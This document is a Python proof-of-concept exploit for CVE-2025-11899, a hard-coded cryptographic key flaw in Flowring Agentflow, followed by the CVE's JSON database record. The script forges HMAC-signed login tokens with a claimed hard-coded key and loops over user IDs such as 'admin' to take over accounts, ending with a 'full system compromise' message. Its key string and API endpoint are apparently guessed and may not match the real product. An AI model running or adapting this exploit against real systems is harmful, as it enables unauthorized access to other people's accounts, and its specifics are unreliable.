CVE-2025-11899

# CVE-2025-11899 PoC - Agentflow Hard-coded Cryptographic Key Exploit # Description: Exploits hard-coded cryptographic key in Flowring Agentflow # to forge authentication tokens and login as arbitrary users. import requests import hmac import hashlib import time import base64 import json TARGET_URL = "https://target-agentflow.example.com" HARDCODED_KEY = b"FlowringAgentflowSecretKey2024!" # Hard-coded key extracted from binary def forge_auth_token(user_id: str) -> str: """ Forge an authentication token using the hard-coded cryptographic key. The token mimics the legitimate server-side verification process. """ timestamp = str(int(time.time())) payload = f"{user_id}|{timestamp}" # Generate HMAC signature using the hard-coded key (same algorithm as server) signature = hmac.new( HARDCODED_KEY, payload.encode('utf-8'), hashlib.sha256 ).hexdigest() # Construct the forged verification token token_data = { "user_id": user_id, "timestamp": timestamp, "signature": signature } token = base64.b64encode(json.dumps(token_data).encode()).decode() return token def exploit_login(user_id: str) -> dict: """ Exploit the hard-coded key vulnerability to login as the specified user. Returns the server response containing session information. """ forged_token = forge_auth_token(user_id) headers = { "Content-Type": "application/json", "Authorization": f"Bearer {forged_token}", "User-Agent": "Agentflow-Client/1.0" } response = requests.post( f"{TARGET_URL}/api/auth/login", json={"user_id": user_id, "token": forged_token}, headers=headers, verify=False ) return { "status_code": response.status_code, "response": response.json() if response.ok else response.text, "forged_token": forged_token } def enumerate_and_exploit(user_id_list: list) -> list: """ Enumerate known user IDs and attempt login for each. In real scenarios, user IDs can be obtained via enumeration or data leaks. """ results = [] for uid in user_id_list: print(f"[*] Attempting to login as user: {uid}") result = exploit_login(uid) if result["status_code"] == 200: print(f"[+] SUCCESS: Logged in as {uid}") results.append(result) else: print(f"[-] FAILED: Could not login as {uid}") return results if __name__ == "__main__": # Step 1: Obtain valid user IDs (via enumeration, leak, or other means) known_user_ids = ["admin", "user001", "user002", "manager"] # Step 2: Forge tokens and exploit successful_logins = enumerate_and_exploit(known_user_ids) # Step 3: With admin access, perform post-exploitation if successful_logins: print(f"[+] Exploited {len(successful_logins)} accounts successfully") print("[+] Full system compromise achieved")

{"cve": {"id": "CVE-2025-11899", "sourceIdentifier": "[email protected]", "published": "2025-10-17T04:16:06.877", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Agentflow developed by Flowring has an Use of Hard-coded Cryptographic Key vulnerability, allowing unauthenticated remote attackers to exploit the fixed key to generate verification information, thereby logging into the system as any user. Attacker must first obtain an user ID in order to exploit this vulnerability."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-321"}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10439-0bd15-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10438-1173e-1.html", "source": "[email protected]"}]}}